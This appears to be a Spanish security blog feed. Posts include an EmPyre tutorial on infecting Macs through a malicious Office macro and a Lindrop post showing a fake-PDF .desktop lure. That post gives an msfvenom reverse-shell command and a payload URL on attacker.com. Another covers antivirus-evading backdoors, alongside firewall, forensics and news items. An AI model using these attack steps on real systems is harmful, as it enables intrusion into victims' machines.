Latest Event Updates

¿CÓMO HACKEAR UNA MÁQUINA MAC DE APPLE CON EMPYRE?

Posted on Updated on

EmPyre es un framework de Post Exploitation construido con Python que ofrece a profesionales de ethical hacking y seguridad de la información lo que es la capacidad de acceder de forma remota a hosts OSX. Es fácil de usar, tiene explotaciones específicas de OSX y cargas ya incorporadas, y realmente hace un cambio refrescante de Metasploit. Visítelos en Github para leer los detalles sobre características y soporte de esta herramienta comúnmente usado por profesionales de de seguridad de la información.

INSTALACIÓN

Usted está usando OSX u otro distro, asegúrese de tener Git instalado antes de comenzar. Estamos usando un nuevo Kali.

INSTALAR EMPYRE

Primero, Git Clone

EmPyre

Ahora debe tener una carpeta llamada EmPyre, y deseará ejecutar install.sh para terminar la instalación.

EmPyre

EmPyre está instalado y listo para funcionar, ahora solo cambie el directorio en EmPyre y ejecute ./empyre para iniciar la interfaz.

EmPyre

Una vez hecho esto, EmPyre se cargará y verá el siguiente menú.

EmPyre

CREAR UN LISTENER

Según expertos de seguridad de la información y ethical hacking, antes de hacer algo, escriba el comando de help y echa un vistazo a las opciones que tiene, sugerimos pasar algún tiempo aprendiendo lo que puedes hacer con la herramienta. Por ahora, queremos iniciar un listener para que nuestras víctimas se conecten también.

Vaya a los listners y escriba las opciones para ver las opciones del listener actual. Este es tu equivalente de “show options” dentro de Metasploit.

EmPyre

Cuando pulses Intro, verás la configuración actual predeterminada para listener que se llamado test. Puedes ver la IP local y todas las otras opciones que están bien para esta guía, pero puede cambiar cualquier cosa que se adapte a tu objetivo explica experto de seguridad de la información y ethical hacking

EmPyre

Cambiar el host es útil si estás deseando NAT tu IP.

EmPyre

Una vez que estés satisfecho con tus opciones, sólo tienes que presionar ejecutar, seguido de tu nombre de listener que se puede ver en las opciones.

EmPyre

Eso es, estamos escuchando shells. Ahora, si estás ejecutando esto en un laboratorio, sólo asegúrete de que puede llegar a la máquina de destino y la red está totalmente bien. Si estás utilizando esto contra un host remoto fuera de su LAN, debes pasar a configurar NAT y cualquier regla que necesite para permitir que el tráfico entre.

CREAR EL DOCUMENTO MALICIOSO

Según expertos de seguridad de la información y ethical hacking, esto no es tan diferente de atacar a las máquinas de Windows, pero vas a tener una mano de ayuda adicional de EmPyre para hacer las cosas un poco más fáciles. Primero, necesitamos crear un office macro malicioso. Puedes regresar al menú principal ingresando “main” y luego entrar en “usestager”. Puede presionar la pestaña para listar todas las opciones disponibles pero usaremos una macro para este ataque.

EmPyre

Ahora, sólo necesitamos decirle al stager qué listener queremos que use, lo cual debería ser fácil, ya que solo tenemos 1 creado, y luego lo encerramos generando la macro.

EmPyre

Si todo va al plan, deberás ver la salida de la macro encendido a la pantalla.

EmPyre

Queremos copiar esta salida en un documento y entrar en una macro. Abra Excel o Word y guarda el documento como un documento habilitado para macros.

EmPyre

Una vez que lo hayas guardado, diríjete a las tools y crea un nuevo macro, asígnale el nombre y luego pegua el código de tu host EmPyre en el Macro. Debe tener un aspecto como este.

EmPyre

Guarda el documento y deja que comience el ataque. La próxima vez que abras este documento, se le pedirá que actives los macros que, por supuesto, lo haremos.

EmPyre

EmPyre

Vas a querer comenzar a interactuar con tu máquina Mac recién infectada. EmPyre los llama agentes, así que simplemente ingrese el comando agents.

EmPyre

Observe la cadena que comienza UKFOM… Este es el identificador único que EmPyre ha dado al host.

EmPyre

A partir de aquí, puedes empezar a lanzar código de shell alrededor como una especie de maníaco. Prueba algunos de los módulos incorporados, hay toneladas de ellos y algunos de ellos son bastante útiles acuerdo a expertos de seguridad de la información y ethical hacking.

EmPyre

Por supuesto, como cualquier otra pantalla, puedes emitir el comando de ayuda y ver todas las otras opciones que tienes.

EmPyre

 

NAXSI – FIREWALL DE SOFTWARE ABIERTO PARA NGINX

Posted on

Un WAF protege una aplicación Web controlando su entrada y salida y el acceso desde la aplicación. Se ejecuta como un dispositivo, un plug-in de servidor o un servicio basado en la nube, el WAF inspecciona todos los paquetes de datos HTML, HTTPS, SOAP y XML-RPC. A través de una inspección personalizable, es capaz de prevenir ataques contra seguridad web como XSS, inyección de SQL,sessionhijacking y buffer overflows, que los firewalls de red y los sistemas de detección de intrusos a menudo no son capaces de realizar.

NAXSI es un WAF de código abierto para Nginx (Web Application Firewall), que por defecto puede bloquear el 99% de los patrones conocidos involucrados en las vulnerabilidades del sitio web. NAXSI significa Nginx Anti XSS & SQL Injection y es creado por expertos de seguridad web.

Por defecto, lee un pequeño subconjunto de reglas simples de seguridad web que contienen el 99% de los patrones conocidos involucrados en vulnerabilidades de sitios web.

Siendo muy simple, esos patrones pueden coincidir con las consultas legítimas. El administrador de seguridad web puede agregar listas blancas manualmente analizando el registro de errores de Nginx o (recomendado) iniciar el proyecto mediante una fase de auto aprendizaje intensivo que generará automáticamente las reglas de lista blanca con respecto al comportamiento del sitio web.

Por el contrario de la mayoría de los firewall de aplicación web, Naxsi no se basa en una base de firmas, como un antivirus, y por lo tanto no puede ser eludido por un patrón de ataque “desconocido”. Acuerda a experiencia de expertos de seguridad web, otra diferencia principal entre NAXSI y otros WAF, NAXSI filtra sólo las solicitudes GET y POST, es un software libre y libre de usar.

Según los expertos de seguridad web de iicybersecurity, WAF como Naxsi puede ser utilizado por PYMES para implementar seguridad web Requiere un poco más de esfuerzo ya que usted tiene a la lista blanca para conseguir que las cosas funcionen, pero bloqueará ataques más ofuscados y poco comunes sin actualizaciones ni modificaciones.

naxsi

 

RAPTOR WAF – UN FIREWALL GRATIS DE APLICACIONES WEB

Posted on

raptor-waf

Un firewall de aplicaciones web (WAF) es un firewall que supervisa seguridad web, filtra o bloquea el tráfico HTTP hacia y desde una aplicación Web.Un WAF también es capaz de detectar y prevenir nuevos ataques desconocidos al observar patrones desconocidos en los datos de tráfico. Raptor WAF es un firewall de aplicaciones web hecho en C, que usa DFA para ayudar en seguridad web y bloquear SQL Inyección, Cross Site Scripting (XSS) y PathTraversal.

Es esencialmente un firewall de aplicación web simple hecho en C, usando el principio KISS, haciendo poll utilizando la función select (), no es mejor que epoll () o kqueue () de BSD, pero es portátil.

Caracteristicas

Según los expertos de seguridad web de iicybersecurity, WAF como Raptor puede ser utilizado por PYMES para implementar seguridad web. Es ampliamente utilizado hoy en día para detectar y defenderse contra la mayoría de las inyecciones de SQL, ataques contra seguridad web y ataques XSS.

  • Bloquear ataques contra seguridad web como de XSS, Inyección de SQL y path traversal
  • Lista negra IPs para bloquear usuarios usando config / blacklist ip.txt
  • Soporta IPv6 e IPv4 para la comunicación

raptor-waf

 

https://github.com/CoolerVoid/raptor_waf

En la BMV, desprotegidas las firmas ante ciberataques

Posted on

los hackers consiguen hasta US600,000 millones al año por invasiones, según especialistas en el tema de ciberseguridad. Desprotegidas y sensibles ante un ataque cibernético. Así se encuentran las emisoras de la Bolsa Mexicana de Valores (BMV). Especialistas coincidieron en que un ataque a sus computadoras, redes e información podría mermar notablemente sus operaciones y afectar sus finanzas. Sin embargo, no se protegen adecuadamente.

Expertos en ataques cibernéticos coincidieron en que las empresas en general y en específico las que cotizan en Bolsa destinan bajo presupuesto a su protección cibernética.

Los sectores que más ataques cibernéticos reciben son el financiero y de comercio electrónico.

Datos del International Institute of Cyber Security indican que en el 2016 cerca de 78% de las empresas en México han sido blanco de un ataque por medio de Internet.

cyber

A pesar de que ha ido en incremento el presupuesto para dicha área, firmas que cotizan en la BMV destinan solamente entre 5 y 8% de su presupuesto a ciberseguridad, porcentaje menor al de las empresas que cotizan en Nasdaq, que destinan entre 7 y 11% de su presupuesto para protegerse de ciberataques.

Dicha institución recomienda a una empresa en Bolsa una inversión anual contra ataques cibernéticos de entre 700,000 a 30 millones de dólares.

Compromiso bajo “El nivel de compromiso para implementar ciberseguridad es bajo ya que sólo 45% de las empresas tiene una estrategia robusta de ciberseguridad y sólo 40% realiza evaluaciones regulares de ciberseguridad”, aseguró German Ruiz, consultor de Seguridad Cibernética-Ethical Hacking en International Institute of Cyber Security.

Marco DeMello, CEO de PSafe, aplicación de defensa contra ataques cibernéticos para teléfonos celulares, dijo que “todavía no están protegidas suficientemente las empresas contra un ciberataque. Son muy vulnerables. Y es que muy pocas empresas que son invadidas lo reportan, entonces no hay una legislación en América Latina para que las empresas que son comprometidas lo reporten al gobierno, no hay obligación legal, más que en Estados Unidos”.

Ruiz agregó que una empresa del tamaño de las que cotizan en Bolsa o internacionales recibe anualmente entre 2 a 10 millones de ataques cibernéticos, de los cuales, entre 2 y 5% son consumados.

Pérdidas millonarias

Sin embargo, a pesar de que el porcentaje es bajo, las pérdidas son cuantiosas a nivel mundial.

“El mercado de ataques cibernéticos en el mundo asciende a 600,000 millones de dólares, aunque dependen del tamaño de la empresa y tipo de negocio.

El costo por la reparación de daños es de entre 10,000 a 50,000 dólares para las pequeñas empresas y entre 50,000 a 150 millones de dólares, para las grandes”, consideró el consultor de Seguridad Cibernética.

 

IR-RESCUE: UNA HERRAMIENTA DE CÓDIGO ABIERTO PARA FORENSE Y RESPUESTA DE INCIDENTES

Posted on

Ir-rescue es un script ligero de Windows Batch que recopila unos numerosos de datos forenses de sistemas Windows de 32 bits y 64 bits respetando el orden de volatilidad y artefactos que se cambian con la ejecución del script. Se destina a la respuesta a incidentes utilizándose en diferentes etapas del proceso de digital forensic e investigación. Puede ser configurado para realizar colecciones completas de datos para fines de digital forensic e investigación, así como personalizar adquisiciones de tipos específicos de datos. La herramienta representa un esfuerzo para agilizar la recolección de datos de máquina, independientemente de las necesidades de la digital forensic y confiar menos en el soporte in sitio cuando el acceso remoto o el análisis en vivo no están disponibles.

Ir-rescue hace uso de comandos integrados de Windows y utilidades de terceros bien conocidas de Sysinternals y NirSoft, por ejemplo, algunas de código abierto. Está diseñada para agrupar las colecciones de datos según el tipo de datos. Por ejemplo, se agrupan todos los datos relacionados con la conexión en red, como los recursos compartidos de archivos abiertos y las conexiones TCP (Protocolo de control de la transmisión), mientras que los procesos, los servicios y las tareas se agrupan bajo malware. La herramienta de digital forensic también está diseñada con el propósito de no hacer uso de PowerShell y WMI (Windows Management Instrumentation) para que sea compatible transversalmente. La adquisición de tipos de datos y otras opciones generales se especifican en un archivo de configuración simple. Cabe señalar que el script lanza un gran número de comandos y herramientas, dejando una huella considerable en el sistema. El tiempo de ejecución varía dependiendo de la potencia de cálculo y de las configuraciones establecidas, aunque suele terminar dentro de un máximo de una hora si está configurado para ejecutarse completamente. Ir-rescue es una de las herramientas usada por los expertos de digital forensic de international institute of cyber security.

Ir-rescue ha sido escrito para la respuesta a incidentes y digital forensic, así como para los profesionales de la seguridad por igual. Por lo tanto, puede utilizarse para aprovechar las herramientas y comandos ya agrupados durante las actividades de digital forensic.

Ir-rescue se basa en una serie de utilidades de terceros para recopilar datos específicos de las maquinas. Las versiones de las herramientas se enumeran en la siguiente sección y se proporcionan con el paquete tal cual y, por lo tanto, sus licencias y acuerdos de usuario deben aceptarse antes de ejecutar ir-rescue.

Ir-rescue debe ejecutarse bajo una consola de línea de comandos con derechos de administrador y no requiere argumentos.

ir-rescue

ir-rescue

ir-rescue

 

LINDROP – UN VECTOR DE INGENIERÍA SOCIAL PARA LOS OBJETIVOS LINUX

Posted on

Según expertos de seguridad perimetral y seguridad lógica, la ingeniería social es el arte de manipular a las personas para que entreguen información confidencial. Los tipos de información que estos criminales están buscando puede variar, pero cuando los individuos son atacados, los criminales suelen tratar de engañarlos para que les den sus contraseñas o información bancaria, o acceder a su computadora para instalar en secreto software malintencionado que les dará acceso a sus contraseñas e información bancaria, así como el control de su computadora.

Los expertos de seguridad perimetral y seguridad lógica han creado un vector de ingeniería social para los objetivos Linux. Lindrop – es un vector de ingeniería social para los objetivos linux. Una utilidad python que genera un zip que contiene un archivo .desktop (shortcut) “malicioso” que se disfraza como un archivo PDF (no realmente, una especie de).Probablemente esto no es nada nuevo, pero los hackers y necesitaban una forma de dirigirse específicamente a los usuarios de Linux para ciertos compromisos de ingeniería social, seguridad perimetral y seguridad lógica donde podían enviar un archivo zip y / o tar.gz por correo electrónico y generar algo sobre la marcha.

Los cursos de seguridad perimetral como de iicybersecurity IICS deben enseñar las herramientas como Lindrop para los participantes entienden como implementar seguridad lógica y seguridad perimetral en su red.

Básicamente explota la sección “Exec” de un archivo .desktop para:

  1. Descargue un PDF y muéstrelo al usuario.
  2. Descargue y ejecute una linux/x86/meterpreter/reverse_tcppayload

Según expertos de seguridad perimetral y seguridad lógica, Lindrop toma 4 entradas:

Un nombre de salida para el archivo “PDF” (.desktop) que estará en el archivo zip.

lindrop

Un nombre de salida para el archivo almacenado.

lindrop

Una URL de carga útil remota. (http://www.attacker.com/payload) esto se descargará en el directorio / tmp en el equipo de destino. Para este ejemplo, simplemente estamos creando una carga útil con msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=listener_ip LPORT=listener_port -f elf > payload

Un PDF remoto para descargarse y mostrarse al usuario. En el caso de este ejemplo, estamos cargando de forma remota  Blackhat 2016’s Attende survey. Detrás de las escenas, Xpdf se utiliza para abrir el archivo PDF.

lindrop

En el lado del atacante, tenemos un listener usando el siguiente archivo de recursos en metasploit, esperando una conexión desde la carga que el archivo .desktop ha descargado, y que hemos generado anteriormente con msfvenom.

lindrop

Según los expertos de seguridad lógica, las soluciones de seguridad tradicional no detectaran un ataque de este tipo.

 

¿CÓMO GENERAR FÁCILMENTE UNA PUERTA TRASERA PARA LINUX, WINDOWS, MAC Y EVITAR EL ANTIVIRUS?

Posted on

thefatrat-tool1

Una puerta trasera es un medio de acceso a un programa informático que evita los mecanismos de ciberseguridad. Un programador de ciberseguridad algunas veces puede instalar una puerta trasera para que se pueda acceder al programa para solucionar problemas de ciberseguridad o para otros fines. Sin embargo, los atacantes suelen utilizar puertas traseras que se detectan o se instalan, como parte de una vulnerabilidad.

En este artículo vamos a discutir una herramienta con la ayuda de expertos de cloud security de iicybersecurity IICS. La herramienta se llama TheFatRat que puede ser utilizada para generar una puerta trasera para Linux, Windows, Mac y evitar AntiVirus.

Según expertos de ciberseguridad y cloud security, TheFatRat es una herramienta fácil de generar puerta trasera con msfvenom (una parte de metasploit Framework). Esta herramienta recopila un malware con una carga útil popular y luego el malware compilado se puede ejecutar en Windows, Mac, Android. El malware que se crea con esta herramienta también tiene la capacidad de pasar por alto la mayor parte de protección de software de Anti Virus. Según su creadores y expertos de ciberseguridad, la puerta trasera, se ejecuta automáticamente si la victima desactiva el uac (user acces control).

UAC es una característica de ciberseguridad de Windows Vista, Windows 7 y Windows 8, que ayuda a evitar cambios no autorizados en el equipo. Estos cambios pueden ser iniciados por aplicaciones, virus u otros usuarios. User Account Control se asegura de que estos cambios se realizan sólo con la aprobación por parte del administrador. Si los cambios no han sido aprobados por el administrador, ellos no se ejecutan y Windows se mantiene sin cambios. Es como si nada hubiera pasado menciona experto de cloud security.

La herramienta de ciberseguridad revisa el servicio de Metasploit y se inicia si no está presente y pueden crear fácilmente meterpreter reverse_tcp playloads para Windows, Linux, Android y Mac.

TheFatRat ha sido creado para hacer frente a los problemas generales que enfrentan los profesionales de ciberseguridad y cloud security. La herramienta se puede iniciar varias meterpreter reverse_tcp listners y hacer una búsqueda rápida en searchsploit.

Los expertos de ciberseguridad han estado utilizando esta herramienta para eludir antivirus, ejecutar Auto run script para los listeners.

Esta herramienta es parte de sistema operativo hacking ético, Dracos Linux

REQUERIMIENTOS

  • Un sistema operativo Linux. Expertos en ciberseguridad recomiendan Kali Linux 2 o Kali 2.016,1 rolling / Cyborg / Parrot / Dracos / BackTrack / Blackbox / y otro sistema operativo (Linux)
  • Debe instalar metasploit Framework